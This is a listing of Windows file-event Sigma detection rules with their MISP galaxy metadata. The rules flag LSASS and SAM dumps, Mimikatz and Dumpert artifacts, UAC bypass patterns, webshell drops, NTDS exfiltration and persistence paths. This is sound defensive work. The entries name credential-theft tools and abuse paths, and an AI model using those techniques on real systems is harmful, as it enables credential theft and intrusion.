Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.

Internal MISP references

UUID 81315b50-6b60-4d8f-9928-3466e1022515 which can be used as unique global reference for Suspicious desktop.ini Action in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)
creation_date 2020/03/19
falsepositive ['Operations performed through Windows SCCM or equivalent', 'Read only access list authority']
filename file_event_win_susp_desktop_ini.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1547.009']

Drop Binaries Into Spool Drivers Color Folder

Detects the creation of suspicious binary files inside "\windows\system32\spool\drivers\color\", as seen in the blog referenced below.

Internal MISP references

UUID ce7066a6-508a-42d3-995b-2952c65dc2ce which can be used as unique global reference for Drop Binaries Into Spool Drivers Color Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/28
falsepositive ['Unknown']
filename file_event_win_susp_spool_drivers_color_drop.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion']

Potential Winnti Dropper Activity

Detects files dropped by Winnti as described in RedMimicry Winnti playbook

Internal MISP references

UUID 130c9e58-28ac-4f83-8574-0a4cc913b97e which can be used as unique global reference for Potential Winnti Dropper Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alexander Rausch
creation_date 2020/06/24
falsepositive ['Unknown']
filename file_event_win_redmimicry_winnti_filedrop.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027']

Suspicious PFX File Creation

A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.

Internal MISP references

UUID dca1b3e8-e043-4ec8-85d7-867f334b5724 which can be used as unique global reference for Suspicious PFX File Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/05/02
falsepositive ['System administrators managing certificates.']
filename file_event_win_susp_pfx_file_creation.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1552.004']

File Creation In Suspicious Directory By Msdt.EXE

Detects msdt.exe creating files in suspicious directories, which could be a sign of exploitation of either the Follina or the DogWalk vulnerability.

Internal MISP references

UUID 318557a5-150c-4c8d-b70e-a9910e199857 which can be used as unique global reference for File Creation In Suspicious Directory By Msdt.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Vadim Varganov, Florian Roth (Nextron Systems)
creation_date 2022/08/24
falsepositive ['Unknown']
filename file_event_win_msdt_susp_directories.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001', 'cve.2022.30190']

Suspicious DotNET CLR Usage Log Artifact

Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.

Internal MISP references

UUID e0b06658-7d1d-4cd3-bf15-03467507ff7c which can be used as unique global reference for Suspicious DotNET CLR Usage Log Artifact in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, omkar72, oscd.community, Wojciech Lesicki
creation_date 2022/11/18
falsepositive ['Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675']
filename file_event_win_net_cli_artefact.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']

Inveigh Execution Artefacts

Detects the presence and execution of Inveigh via dropped artefacts

Internal MISP references

UUID bb09dd3e-2b78-4819-8e35-a7c1b874e449 which can be used as unique global reference for Inveigh Execution Artefacts in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/24
falsepositive ['Unlikely']
filename file_event_win_hktl_inveigh_artefacts.yml
level critical
logsource.category file_event
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']

UAC Bypass Using EventVwr

Detects the pattern of a UAC bypass using Windows Event Viewer

Internal MISP references

UUID 63e4f530-65dc-49cc-8f80-ccfa95c69d43 which can be used as unique global reference for UAC Bypass Using EventVwr in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)
creation_date 2022/04/27
falsepositive ['Unknown']
filename file_event_win_uac_bypass_eventvwr.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation']

Suspicious ASPX File Drop by Exchange

Detects a suspicious file type dropped by an Exchange component in IIS into a suspicious folder.

Internal MISP references

UUID bd1212e5-78da-431e-95fa-c58e3237a8e6 which can be used as unique global reference for Suspicious ASPX File Drop by Exchange in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), MSTI (query, idea)
creation_date 2022/10/01
falsepositive ['Unknown']
filename file_event_win_exchange_webshell_drop.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1505.003']

Adwind RAT / JRAT File Artifact

Detects javaw.exe in AppData folder as used by Adwind / JRAT

Internal MISP references

UUID 0bcfabcb-7929-47f4-93d6-b33fb67d34d1 which can be used as unique global reference for Adwind RAT / JRAT File Artifact in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community
creation_date 2017/11/10
falsepositive No established falsepositives
filename file_event_win_mal_adwind.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.t1059.005', 'attack.t1059.007']

HackTool - Dumpert Process Dumper Default File

Detects the creation of the default dump file used by the Outflank Dumpert tool, a process dumper that dumps the memory of the LSASS process.

Internal MISP references

UUID 93d94efc-d7ad-4161-ad7d-1638c4f908d8 which can be used as unique global reference for HackTool - Dumpert Process Dumper Default File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2020/02/04
falsepositive ['Very unlikely']
filename file_event_win_hktl_dumpert.yml
level critical
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']

LSASS Process Dump Artefact In CrashDumps Folder

Detects the presence of an LSASS dump file in the "CrashDumps" folder. This could be a sign of LSASS credential dumping. Techniques such as LSASS Shtinkering have been seen abusing Windows Error Reporting to dump this process.

Internal MISP references

UUID 6902955a-01b7-432c-b32a-6f5f81d8f625 which can be used as unique global reference for LSASS Process Dump Artefact In CrashDumps Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @pbssubhash
creation_date 2022/12/08
falsepositive ['Rare legitimate dump of the process by the operating system due to a crash of lsass']
filename file_event_win_lsass_shtinkering.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']

Anydesk Temporary Artefact

An adversary may use legitimate desktop support and remote access software, such as TeamViewer, Go2Assist, LogMeIn, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and TeamViewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Internal MISP references

UUID 0b9ad457-2554-44c1-82c2-d56a99c42377 which can be used as unique global reference for Anydesk Temporary Artefact in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/11
falsepositive ['Legitimate use']
filename file_event_win_anydesk_artefact.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']

Process Monitor Driver Creation By Non-Sysinternals Binary

Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself.

Internal MISP references

UUID a05baa88-e922-4001-bc4d-8738135f27de which can be used as unique global reference for Process Monitor Driver Creation By Non-Sysinternals Binary in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/05
falsepositive ['Some false positives may occur with legitimate renamed process monitor binaries']
filename file_event_win_sysinternals_procmon_driver_susp_creation.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1068']

Mimikatz Kirbi File Creation

Detects the creation of files associated with Mimikatz, such as ".kirbi", "mimilsa.log", etc.

Internal MISP references

UUID 9e099d99-44c2-42b6-a6d8-54c3545cab29 which can be used as unique global reference for Mimikatz Kirbi File Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), David ANDRE
creation_date 2021/11/08
falsepositive ['Unlikely']
filename file_event_win_hktl_mimikatz_files.yml
level critical
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1558']

PSScriptPolicyTest Creation By Uncommon Process

Detects the creation of the "PSScriptPolicyTest" PowerShell script by an uncommon process. This file is usually generated by Microsoft PowerShell to test against AppLocker.

Internal MISP references

UUID 1027d292-dd87-4a1a-8701-2abe04d7783c which can be used as unique global reference for PSScriptPolicyTest Creation By Uncommon Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/01
falsepositive ['Unknown']
filename file_event_win_ps_script_policy_test_creation_by_uncommon_process.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion']

Wmiexec Default Output File

Detects the creation of the default output filename used by the wmiexec tool

Internal MISP references

UUID 8d5aca11-22b3-4f22-b7ba-90e60533e1fb which can be used as unique global reference for Wmiexec Default Output File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/02
falsepositive ['Unlikely']
filename file_event_win_wmiexec_default_filename.yml
level critical
logsource.category file_event
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1047']

RemCom Service File Creation

Detects the default RemCom service filename, which indicates RemCom service installation and execution.

Internal MISP references

UUID 7eff1a7f-dd45-4c20-877a-f21e342a7611 which can be used as unique global reference for RemCom Service File Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/04
falsepositive ['Unknown']
filename file_event_win_remcom_service.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.t1569.002', 'attack.s0029']

New Outlook Macro Created

Detects the creation of a macro file for Outlook.

Internal MISP references

UUID 8c31f563-f9a7-450c-bfa8-35f8f32f1f61 which can be used as unique global reference for New Outlook Macro Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @ScoubiMtl
creation_date 2021/04/05
falsepositive ['User genuinely creates a VB Macro for their email']
filename file_event_win_office_outlook_macro_creation.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.command_and_control', 'attack.t1137', 'attack.t1008', 'attack.t1546']

Suspicious Screensaver Binary File Creation

Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.

Internal MISP references

UUID 97aa2e88-555c-450d-85a6-229bcd87efb8 which can be used as unique global reference for Suspicious Screensaver Binary File Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/29
falsepositive ['Unknown']
filename file_event_win_creation_scr_binary_file.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1546.002']

Potential Startup Shortcut Persistence Via PowerShell.EXE

Detects PowerShell writing startup shortcuts. This procedure was highlighted in Red Canary Intel Insights, Oct. 2021: "We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence. Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats. In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL."

Internal MISP references

UUID 92fa78e7-4d39-45f1-91a3-8b23f3f1088d which can be used as unique global reference for Potential Startup Shortcut Persistence Via PowerShell.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock '@securepeacock', SCYTHE
creation_date 2021/10/24
falsepositive ['Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies indicative of malware.']
filename file_event_win_powershell_startup_shortcuts.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']

Office Macro File Creation From Suspicious Process

Detects the creation of an Office macro file by a suspicious process.

Internal MISP references

UUID b1c50487-1967-4315-a026-6491686d860e which can be used as unique global reference for Office Macro File Creation From Suspicious Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/01/23
falsepositive ['Unknown']
filename file_event_win_office_macro_files_from_susp_process.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.initial_access', 'attack.t1566.001']

Dynamic CSharp Compile Artefact

When C# is compiled dynamically, a .cmdline file is created as part of the process. Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution.

Internal MISP references

UUID e4a74e34-ecde-4aab-b2fb-9112dd01aed0 which can be used as unique global reference for Dynamic CSharp Compile Artefact in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/09
falsepositive ['Unknown']
filename file_event_win_csharp_compile_artefact.yml
level low
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027.004']

Startup Folder File Write

A general detection for files being created in the Windows startup directory. This could be an indicator of persistence.

Internal MISP references

UUID 2aa0a6b4-a865-495b-ab51-c28249537b75 which can be used as unique global reference for Startup Folder File Write in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/05/02
falsepositive ['FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate']
filename file_event_win_startup_folder_file_write.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']

UAC Bypass Using NTFS Reparse Point - File

Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)

Internal MISP references

UUID 7fff6773-2baa-46de-a24a-b6eec1aba2d1 which can be used as unique global reference for UAC Bypass Using NTFS Reparse Point - File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/30
falsepositive ['Unknown']
filename file_event_win_uac_bypass_ntfs_reparse_point.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']

NTDS Exfiltration Filename Patterns

Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration.

Internal MISP references

UUID 3a8da4e0-36c1-40d2-8b29-b3e890d5172a which can be used as unique global reference for NTDS Exfiltration Filename Patterns in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/03/11
falsepositive ['Unknown']
filename file_event_win_ntds_exfil_tools.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.003']

Suspicious Interactive PowerShell as SYSTEM

Detects the creation of files that indicate interactive use of PowerShell in the SYSTEM user context.

Internal MISP references

UUID 5b40a734-99b6-4b98-a1d0-1cea51a08ab2 which can be used as unique global reference for Suspicious Interactive PowerShell as SYSTEM in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/12/07
falsepositive ['Administrative activity', 'PowerShell scripts running as SYSTEM user']
filename file_event_win_susp_system_interactive_powershell.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']

UAC Bypass Using IDiagnostic Profile - File

Detects the creation of a file by "dllhost.exe" in the System32 directory as part of the "IDiagnosticProfileUAC" UAC bypass technique.

Internal MISP references

UUID 48ea844d-19b1-4642-944e-fe39c2cc1fec which can be used as unique global reference for UAC Bypass Using IDiagnostic Profile - File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/03
falsepositive ['Unknown']
filename file_event_win_uac_bypass_idiagnostic_profile.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']

Legitimate Application Dropped Archive

Detects programs on a Windows system that should not write an archive to disk doing so.

Internal MISP references

UUID 654fcc6d-840d-4844-9b07-2c3300e54a26 which can be used as unique global reference for Legitimate Application Dropped Archive in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Florian Roth
creation_date 2022/08/21
falsepositive ['Unknown']
filename file_event_win_susp_legitimate_app_dropping_archive.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']

Suspicious Desktopimgdownldr Target File

Detects a suspicious file creation by the Microsoft desktopimgdownldr utility that stores a file in a suspicious location or writes a file with a suspicious extension.

Internal MISP references

UUID fc4f4817-0c53-4683-a4ee-b17a64bc1039 which can be used as unique global reference for Suspicious Desktopimgdownldr Target File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2020/07/03
falsepositive ['False positives depend on scripts and administrative tools used in the monitored environment']
filename file_event_win_susp_desktopimgdownldr_file.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']

UAC Bypass Using Consent and Comctl32 - File

Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)

Internal MISP references

UUID 62ed5b55-f991-406a-85d9-e8e8fdf18789 which can be used as unique global reference for UAC Bypass Using Consent and Comctl32 - File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/23
falsepositive ['Unknown']
filename file_event_win_uac_bypass_consent_comctl32.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']

Potential Suspicious PowerShell Module File Created

Detects the creation of a new PowerShell module directly in the first folder of the module directory structure, e.g. "\WindowsPowerShell\Modules\malware\malware.psm1". This is a somewhat uncommon practice, as legitimate modules usually include a version folder.

Internal MISP references

UUID e8a52bbd-bced-459f-bd93-64db45ce7657 which can be used as unique global reference for Potential Suspicious PowerShell Module File Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/09
falsepositive ['False positive rate will vary depending on the environments. Additional filters might be required to make this logic usable in production.']
filename file_event_win_powershell_module_susp_creation.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence']

Potential SAM Database Dump

Detects the creation of files that look like exports of the local SAM (Security Account Manager)

Internal MISP references

UUID 4e87b8e2-2ee9-4b2a-a715-4727d297ece0 which can be used as unique global reference for Potential SAM Database Dump in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/02/11
falsepositive ['Rare cases of administrative activity']
filename file_event_win_sam_dump.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.002']

PowerShell Script Dropped Via PowerShell.EXE

Detects PowerShell creating a PowerShell script file (.ps1). While this behavior is often benign, it can sometimes be a sign of a dropper script trying to achieve persistence.

Internal MISP references

UUID 576426ad-0131-4001-ae01-be175da0c108 which can be used as unique global reference for PowerShell Script Dropped Via PowerShell.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023/05/09
falsepositive ['False positives will differ depending on the environment and scripts used. Apply additional filters accordingly.']
filename file_event_win_powershell_drop_powershell.yml
level low
logsource.category file_event
logsource.product windows
tags ['attack.persistence']

UAC Bypass Using MSConfig Token Modification - File

Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)

Internal MISP references

UUID 41bb431f-56d8-4691-bb56-ed34e390906f which can be used as unique global reference for UAC Bypass Using MSConfig Token Modification - File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/30
falsepositive ['Unknown']
filename file_event_win_uac_bypass_msconfig_gui.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']

Rclone Config File Creation

Detects Rclone config files being created

Internal MISP references

UUID 34986307-b7f4-49be-92f3-e7a4d01ac5db which can be used as unique global reference for Rclone Config File Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Aaron Greetham (@beardofbinary) - NCC Group
creation_date 2021/05/26
falsepositive ['Legitimate Rclone usage']
filename file_event_win_rclone_config_files.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.exfiltration', 'attack.t1567.002']

Suspicious Unattend.xml File Access

Detects attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are kept. If these files exist, their contents will be displayed. They are used to store credentials and answers during the unattended Windows installation process.

Internal MISP references

UUID 1a3d42dd-3763-46b9-8025-b5f17f340dfb which can be used as unique global reference for Suspicious Unattend.xml File Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/19
falsepositive ['Unknown']
filename file_event_win_access_susp_unattend_xml.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1552.001']

EVTX Created In Uncommon Location

Detects the creation of new files with the ".evtx" extension in uncommon or non-standard locations. This could indicate tampering with default EVTX locations in order to evade security controls, or simply exfiltration of event logs to search for sensitive information within them. Note that backup software and legitimate administrators might perform similar actions during troubleshooting.

Internal MISP references

UUID 65236ec7-ace0-4f0c-82fd-737b04fd4dcb which can be used as unique global reference for EVTX Created In Uncommon Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author D3F7A5105
creation_date 2023/01/02
falsepositive ['Administrator or backup activity', 'An unknown bug seems to trigger the Windows "svchost" process to drop EVTX files in the "C:\Windows\Temp" directory in the form "_.evtx". See https://superuser.com/questions/1371229/low-disk-space-after-filling-up-c-windows-temp-with-evtx-and-txt-files']
filename file_event_win_create_evtx_non_common_locations.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.002']

LiveKD Driver Creation

Detects the creation of the LiveKD driver, which is used for live kernel debugging.

Internal MISP references

UUID 16fe46bb-4f64-46aa-817d-ff7bec4a2352 which can be used as unique global reference for LiveKD Driver Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/16
falsepositive ['Legitimate usage of LiveKD for debugging purposes will also trigger this']
filename file_event_win_sysinternals_livekd_driver.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation']

UAC Bypass Abusing Winsat Path Parsing - File

Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)

Internal MISP references

UUID 155dbf56-e0a4-4dd0-8905-8a98705045e8 which can be used as unique global reference for UAC Bypass Abusing Winsat Path Parsing - File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/30
falsepositive ['Unknown']
filename file_event_win_uac_bypass_winsat.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']

Publisher Attachment File Dropped In Suspicious Location

Detects the creation of files with the ".pub" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents.

Internal MISP references

UUID 3d2a2d59-929c-4b78-8c1a-145dfe9e07b1 which can be used as unique global reference for Publisher Attachment File Dropped In Suspicious Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/08
falsepositive ['Legitimate usage of ".pub" files from those locations']
filename file_event_win_office_publisher_files_in_susp_locations.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion']

UAC Bypass Using IEInstal - File

Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)

Internal MISP references

UUID bdd8157d-8e85-4397-bb82-f06cc9c71dbb which can be used as unique global reference for UAC Bypass Using IEInstal - File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/30
falsepositive ['Unknown']
filename file_event_win_uac_bypass_ieinstal.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']

Assembly DLL Creation Via AspNetCompiler

Detects the creation of new DLL assembly files by "aspnet_compiler.exe", which could be a sign of "aspnet_compiler" abuse to proxy execution through a build provider.

Internal MISP references

UUID 4c7f49ee-2638-43bb-b85b-ce676c30b260 which can be used as unique global reference for Assembly DLL Creation Via AspNetCompiler in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/14
falsepositive ['Legitimate assembly compilation using a build provider']
filename file_event_win_aspnet_temp_files.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.execution']

PsExec Service File Creation

Detects the default PsExec service filename, which indicates PsExec service installation and execution.

Internal MISP references

UUID 259e5a6a-b8d2-4c38-86e2-26c5e651361d which can be used as unique global reference for PsExec Service File Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2017/06/12
falsepositive ['Unknown']
filename file_event_win_sysinternals_psexec_service.yml
level low
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.t1569.002', 'attack.s0029']

Potential Initial Access via DLL Search Order Hijacking

Detects attempts to create a DLL file in a known desktop application dependencies folder, such as those of Slack, Teams or OneDrive, by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.

Internal MISP references

UUID dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c which can be used as unique global reference for Potential Initial Access via DLL Search Order Hijacking in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch (rule), Elastic (idea)
creation_date 2022/10/21
falsepositive ['Unknown']
filename file_event_win_initial_access_dll_search_order_hijacking.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.t1566', 'attack.t1566.001', 'attack.initial_access', 'attack.t1574', 'attack.t1574.001', 'attack.defense_evasion']

Suspicious Creation with Colorcpl

Once executed, colorcpl.exe will copy an arbitrary file to c:\windows\system32\spool\drivers\color\

Internal MISP references

UUID e15b518d-b4ce-4410-a9cd-501f23ce4a18 which can be used as unique global reference for Suspicious Creation with Colorcpl in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/21
falsepositive ['Unknown']
filename file_event_win_susp_colorcpl.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564']

File With Uncommon Extension Created By An Office Application

Detects the creation of files with an executable or script extension by an Office application.

Internal MISP references

UUID c7a74c80-ba5a-486e-9974-ab9e682bc5e4 which can be used as unique global reference for File With Uncommon Extension Created By An Office Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/08/23
falsepositive ['Unknown']
filename file_event_win_office_susp_file_extension.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.t1204.002', 'attack.execution']

Hijack Legit RDP Session to Move Laterally

Detects the usage of the tsclient share to place a backdoor in the RDP source machine's startup folder.

Internal MISP references

UUID 52753ea4-b3a0-4365-910d-36cff487b789 which can be used as unique global reference for Hijack Legit RDP Session to Move Laterally in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden
creation_date 2019/02/21
falsepositive ['Unlikely']
filename file_event_win_tsclient_filewrite_startup.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']

Suspicious File Creation Activity From Fake Recycle.Bin Folder

Detects file write events from/to a fake recycle bin folder, which is often used as a staging directory for malware.

Internal MISP references

UUID cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca which can be used as unique global reference for Suspicious File Creation Activity From Fake Recycle.Bin Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/07/12
falsepositive ['Unknown']
filename file_event_win_susp_recycle_bin_fake_exec.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion']

LSASS Process Memory Dump Creation Via Taskmgr.EXE

Detects the creation of an "lsass.dmp" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager.

Internal MISP references

UUID 69ca12af-119d-44ed-b50f-a47af0ebc364 which can be used as unique global reference for LSASS Process Memory Dump Creation Via Taskmgr.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel
creation_date 2023/10/19
falsepositive ['Rare case of troubleshooting by an administrator or support that has to be investigated regardless']
filename file_event_win_taskmgr_lsass_dump.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']

NTDS.DIT Created

Detects creation of a file named "ntds.dit" (Active Directory Database)

Internal MISP references

